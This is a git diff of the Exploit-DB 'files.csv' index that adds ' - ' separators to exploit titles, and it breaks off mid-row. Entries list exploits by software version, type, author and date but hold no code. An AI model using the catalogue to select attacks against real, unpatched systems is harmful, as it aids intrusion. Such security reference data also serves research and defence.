diff --git a/files.csv b/files.csv index 127ca1023..859939f20 100755 --- a/files.csv +++ b/files.csv @@ -14504,7 +14504,7 @@ id,file,description,date,author,platform,type,port 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,metasploit,windows,remote,80 16698,platforms/windows/remote/16698.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,metasploit,windows,remote,0 16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,metasploit,windows,remote,0 -16700,platforms/windows/remote/16700.rb,"Outlook ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0 +16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,windows,remote,3306 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,metasploit,windows,remote,21 16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server Input Overflow",2010-10-05,metasploit,windows,remote,0 @@ -15068,7 +15068,7 @@ id,file,description,date,author,platform,type,port 17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection Vulnerability",2011-05-26,"AutoSec Tools",php,webapps,0 17326,platforms/windows/shellcode/17326.rb,"DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0 -17327,platforms/php/webapps/17327.txt,"HB Ecommerce SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0 +17327,platforms/php/webapps/17327.txt,"HB Ecommerce - SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0 17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0 @@ -16525,7 +16525,7 @@ id,file,description,date,author,platform,type,port 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0 19122,platforms/linux/local/19122.txt,"Slackware Linux <= 3.5 - /etc/group missing results in Root access Vulnerability",1998-07-13,"Richard Thomas",linux,local,0 -19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0 +19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0 19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D symlink Vulnerability",1998-07-15,emffmmadffsdf,linux,remote,0 19125,platforms/linux/local/19125.txt,"Oracle 8 oratclsh Suid Vulnerability",1999-04-29,"Dan Sugalski",linux,local,0 19126,platforms/solaris/local/19126.txt,"Sun Solaris <= 2.6 power management Vulnerability",1998-07-16,"Ralf Lehmann",solaris,local,0 @@ -16761,7 +16761,7 @@ id,file,description,date,author,platform,type,port 19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"Jesús López de Aguileta",multiple,remote,0 19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability",1999-04-09,dreamer,netware,local,0 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights Vulnerability",1999-04-09,"Simple Nomad",netware,remote,0 -19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0 +19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 - Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay Vulnerability",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0 @@ -17018,7 +17018,7 @@ id,file,description,date,author,platform,type,port 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow Vulnerability (2)",1999-11-30,"Synnergy Networks",unix,remote,0 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure",1999-11-30,UNYUN,solaris,local,0 19648,platforms/solaris/local/19648.c,"Solaris 7.0 CDE dtmail/mailtool Buffer Overflow Vulnerability",1999-11-30,UNYUN,solaris,local,0 -19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0 +19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0 19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc Symlink Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0 19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 Seyon setgid dialer Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0 19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0 @@ -17069,7 +17069,7 @@ id,file,description,date,author,platform,type,port 19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0 19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 GET Buffer Overflow Vulnerability",1999-12-31,"Ussr Labs",windows,dos,0 19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 PATH Vulnerability",1999-12-30,Loneguard,multiple,local,0 -19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0 +19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0 19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 midikeys/soundplayer Vulnerability",1999-12-31,Loneguard,irix,local,0 19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link Vulnerability",1999-12-31,Loneguard,unix,local,0 19708,platforms/php/remote/19708.php,"PHP <= 3.0.13 - 'safe_mode' Failure Vulnerability",2000-01-04,"Kristian Koehntopp",php,remote,0 @@ -17084,7 +17084,7 @@ id,file,description,date,author,platform,type,port 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0 19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0 19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag Vulnerability",2000-01-07,"Georgi Guninski",windows,remote,0 -19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0 +19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability",2000-02-15,"Viktor Fougstedt",multiple,local,0 19722,platforms/unix/remote/19722.txt,"RedHat <= 6.1_IRIX <= 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH Vulnerability",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 @@ -17308,7 +17308,7 @@ id,file,description,date,author,platform,type,port 19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service Vulnerability",2000-05-18,"Chris Evans",linux,dos,0 19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0_Cart32 2.5 a/3.0_Shop Express 1.0_StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability",2000-02-01,CDI,cgi,remote,0 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 -19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 +19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0_qpopper 2.52/2.53 - 'EUIDL' Format String Input Vulnerability",2000-05-24,Prizm,linux,local,0 19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal Vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000 @@ -17732,15 +17732,15 @@ id,file,description,date,author,platform,type,port 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0 20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - DoS Vulnerability",2000-11-10,sozni,cgi,dos,0 21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5_Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0 -20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0 +20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0 20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,dos,0 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow Vulnerability",2000-11-14,Vort-fu,beos,remote,0 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure Vulnerability",2000-11-16,CORE-SDI,multiple,remote,0 -20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0 +20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0 20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - _thesection_ Directory Traversal Vulnerability",2000-11-20,zorgon,cgi,remote,0 -20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0 +20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0 20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 Svgalib Buffer Overflow Vulnerability",2000-11-20,Synnergy.net,unix,local,0 20411,platforms/linux/local/20411.c,"Oracle 8.x cmctl Buffer Overflow Vulnerability",2000-11-20,anonymous,linux,local,0 20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 JSP Source Disclosure Vulnerability",2000-11-21,"Wojciech Woch",jsp,remote,0 @@ -18836,7 +18836,7 @@ id,file,description,date,author,platform,type,port 21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting Vulnerability",2002-06-14,"Dave Palumbo",windows,remote,0 21556,platforms/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos,0 21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 PHP Include File Arbitrary Command Execution Vulnerability",2002-06-15,onlooker,php,webapps,0 -21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0 +21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0 21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)",2002-06-17,"Gobbles Security",multiple,remote,0 21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)",2002-06-17,"Gobbles Security",multiple,remote,0 21561,platforms/hardware/dos/21561.txt,"Zyxel Prestige 642R Malformed Packet Denial of Service Vulnerability",2002-07-17,"Kistler Ueli",hardware,dos,0 @@ -19107,7 +19107,7 @@ id,file,description,date,author,platform,type,port 21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability",2002-09-23,"Taylor Huff",hardware,remote,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch Device Reset Denial of Service Vulnerability",2002-09-24,"Brook Powers",hardware,dos,0 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 HTML Injection Vulnerability",2002-09-24,das@hush.com,php,webapps,0 -21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 +21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload Vulnerability",2012-10-10,metasploit,php,webapps,0 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload Vulnerability",2012-10-10,metasploit,linux,webapps,0 @@ -19587,7 +19587,7 @@ id,file,description,date,author,platform,type,port 22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall Content Filter Bypassing Vulnerability",2003-03-05,bit_logic,multiple,remote,0 22328,platforms/windows/dos/22328.txt,"Dr.Web 4.x Virus Scanner Folder Name Buffer Overflow Vulnerability",2003-03-05,"Fernandez Madrid",windows,dos,0 22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 HTML Source Password Retrieval Vulnerability",2003-03-03,THR,windows,local,0 -22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0 +22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution Vulnerability",2003-03-06,"gregory Le Bras",php,webapps,0 22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 Logbook.pl Remote Command Execution Vulnerability",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 22338,platforms/windows/remote/22338.txt,"Clearswift MailSweeper 4.x Malformed MIME Attachment Filter Bypass Vulnerability",2003-03-07,http-equiv,windows,remote,0 @@ -19622,7 +19622,7 @@ id,file,description,date,author,platform,type,port 22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0 22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0 -22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0 +22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0 22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 @@ -20745,7 +20745,7 @@ id,file,description,date,author,platform,type,port 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection",2012-12-20,"Spencer McIntyre",multiple,remote,0 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 -23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 Crash PoC",2012-12-20,nitr0us,multiple,dos,0 +23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash PoC",2012-12-20,nitr0us,multiple,dos,0 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting Vulnerability",2004-01-06,Windak,php,webapps,0 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 PHPInfo Information Disclosure Weakness",2004-01-06,Windak,php,webapps,0 23527,platforms/hardware/remote/23527.txt,"ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",hardware,remote,0 @@ -21008,7 +21008,7 @@ id,file,description,date,author,platform,type,port 23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 Pop Parameter Cross-Site Scripting Vulnerability",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0 23796,platforms/windows/remote/23796.html,"Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability",2004-03-09,shaun2k2,windows,remote,0 23797,platforms/php/webapps/23797.txt,"Confixx 2 DB Parameter SQL Injection Vulnerability",2004-03-09,wkr,php,webapps,0 -23798,platforms/php/webapps/23798.txt,"Confixx 2 Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0 +23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0 23799,platforms/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String Vulnerability",2004-03-10,"Luigi Auriemma",multiple,dos,0 23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x Cookie Path Traversal Information Disclosure",2004-03-10,"Corsaire Limited",osx,remote,0 23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting Vulnerability",2004-03-11,"Donato Ferrante",linux,remote,0 @@ -22941,7 +22941,7 @@ id,file,description,date,author,platform,type,port 25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability",2005-06-01,"Jim Pangalos",asp,webapps,0 25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 LOGIN.ASP SQL Injection Vulnerability",2005-06-01,"Dj romty",asp,webapps,0 -25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 +25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0 25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0 25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 - Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0 @@ -23068,7 +23068,7 @@ id,file,description,date,author,platform,type,port 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0 25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0 -25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0 +25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0 25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0 25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution Vulnerability",2005-06-29,blahplok,cgi,webapps,0 25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 Read.PHP SQL Injection Vulnerability",2004-10-24,"Positive Technologies",php,webapps,0 @@ -23321,7 +23321,7 @@ id,file,description,date,author,platform,type,port 26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET msdds.dll Remote Code Execution Vulnerability",2005-08-17,anonymous,windows,remote,0 -26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0 +26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 Site Parameter Directory Traversal Vulnerability",2005-08-18,matrix_killer,php,webapps,0 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 login.php course Parameter XSS",2005-08-18,matrix_killer,php,webapps,0 26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.PHP Arbitrary Command Execution Vulnerability",2005-08-18,rgod,php,webapps,0 @@ -25943,7 +25943,7 @@ id,file,description,date,author,platform,type,port 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0 28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0 -28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0 +28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0 28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.PHP Remote File Include Vulnerability",2006-11-07,navairum,php,webapps,0 28900,platforms/php/webapps/28900.txt,"ac4p Mobile index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 @@ -33334,7 +33334,7 @@ id,file,description,date,author,platform,type,port 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 -36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 +36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900 36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0 @@ -33952,7 +33952,7 @@ id,file,description,date,author,platform,type,port 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80 37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80 37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80 -37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0 +37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0 37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0 @@ -34172,7 +34172,7 @@ id,file,description,date,author,platform,type,port 37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting Vulnerability",2012-11-29,"Aditya Balapure",php,webapps,0 -38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,"Glaysson dos Santos",hardware,webapps,80 +38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP 